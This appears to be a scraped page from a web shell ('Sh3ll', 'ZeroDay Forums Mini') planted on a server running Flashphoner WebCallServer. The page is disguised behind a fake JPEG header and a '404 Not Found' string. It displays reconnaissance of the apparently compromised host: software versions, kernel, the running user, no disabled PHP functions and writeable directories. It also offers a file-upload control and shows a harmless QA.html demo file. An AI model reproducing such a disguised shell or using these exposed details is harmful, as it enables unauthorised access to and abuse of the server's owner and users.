����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/local/FlashphonerWebCallServer/client/examples/tools/qa/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/FlashphonerWebCallServer/client/examples/tools/qa/QA.html
<!DOCTYPE html>
<html>
<head>
    <title>Phone min</title>
    <!-- JQuery -->
    <script type="text/javascript" src="../../../dependencies/jquery/jquery-1.12.0.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery-ui.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery.websocket.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery.json.js"></script>
    <!-- ****** -->

    <!-- WCS JavaScript API -->
    <script type="text/javascript" src="../../../Flashphoner.js"></script>
    <script type="text/javascript" src="../../ConfigurationLoader.js"></script>
    <script type="text/javascript" src="../../../dependencies/swf/swfobject.js"></script>
    <script type="text/javascript" src="../../../dependencies/websocket-player/WSPlayer.js"></script>

    <!-- Minimum script for calls -->
    <script type="text/javascript" src="QA.js"></script>

</head>
<body onload="initAPI()">
<label for="mediaProvider">Media provider:</label>
<select id="mediaProvider">
    <option value="WebRTC">WebRTC</option>
    <option value="Flash">Flash</option>
    <option value="WSPlayer">WSPlayer</option>
</select>
<br>
<br>
<label for="accountType">Account type:</label>
<select id="accountType">
    <option value="CALL">Call</option>
    <option value="STREAM">Stream</option>
</select>
<br>
<br>
<label for="client">Client:</label><input id="client" type="text" value=""/>
<br>
<br>
<input id="connectButton" type="button" value="Connect" onclick="initAccess()"/>
<br>
<br>
<video id="remoteVideo" autoplay style="background-color: #000000; width:320px; height:240px;"></video>
<canvas id="videoCanvas" width="320" height="240"></canvas>
</body>
</html>

ZeroDay Forums Mini